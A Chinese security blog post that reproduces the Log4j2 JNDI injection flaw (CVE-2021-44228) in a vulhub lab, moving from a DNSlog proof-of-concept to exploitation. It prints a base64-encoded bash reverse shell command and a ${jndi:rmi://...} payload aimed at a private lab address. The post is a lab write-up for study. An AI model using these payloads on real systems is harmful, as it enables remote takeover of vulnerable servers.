freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)复现记录
2023-09-12 09:44:51

1.Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

参考博客:http://base.i-zeeker.com/4981/,新人发帖,如有雷同,纯属ctrl+CV,若有不适,留言删帖(看到之后哦,狗头.jpg)

2.环境搭建 vulhub

1694482564_64ffc084dfe63675f6165.png!small?1694482565236

1694482571_64ffc08b4c7b1684d0e33.png!small?1694482571208

3.POC测试,准备dnslog(http://www.dnslog.cn),打开网站如下所示,打开的网站域名为ste5gx.dnslog.cn,截图如下所示

1694482575_64ffc08fb7403cb378127.png!small?1694482576359

1694482582_64ffc09645ea1444e5acc.png!small

4.EXP利用

log4j漏洞,反弹shell到本地,验证漏洞利用的程度如何。

利用工具为JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,该工具是某大佬写得JNDI注入利用工具,项目地址https://github.com/welk1n/JNDI-Injection-Exploit

JNDI解释: JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。

1.1. 执行反弹shell命令:(注意避坑,docker环境未必能访问攻击机环境,我在宿主机上完成的)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c “{echo,bash -i >& /dev/tcp/192.168.219.128/8888 0>&1}|{base64,-d}|{bash,-i}” -A 192.168.219.128

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxOS4xMjgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.219.128

1694482650_64ffc0daae3d57028067a.png!small?1694482651273

查看平台的java版本为1.8,如下图所示

1694482655_64ffc0df658d359bf0c05.png!small?1694482655737

通过执行结果返回来的值,可以知道rmi值为

—————————-JNDI Links—————————-

1694482660_64ffc0e47c643c93d0138.png!small?1694482660550

1.2. 执行payload

构造好的payload为:${jndi:rmi://192.168.219.128:1099/m37btk}

在浏览器前端执行构造好的payload的结果如下图所示

1694482668_64ffc0ec5d38d19ba32ea.png!small?1694482668708

1694482674_64ffc0f2ec4d6b12f6074.png!small?1694482675988

1694482686_64ffc0fee1cc9b77eaa6b.png!small?1694482687216

1694482692_64ffc1041bc1f50e3d6bf.png!small?1694482692987


# 漏洞 # 渗透测试 # 网络安全 # web安全 # 漏洞分析
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录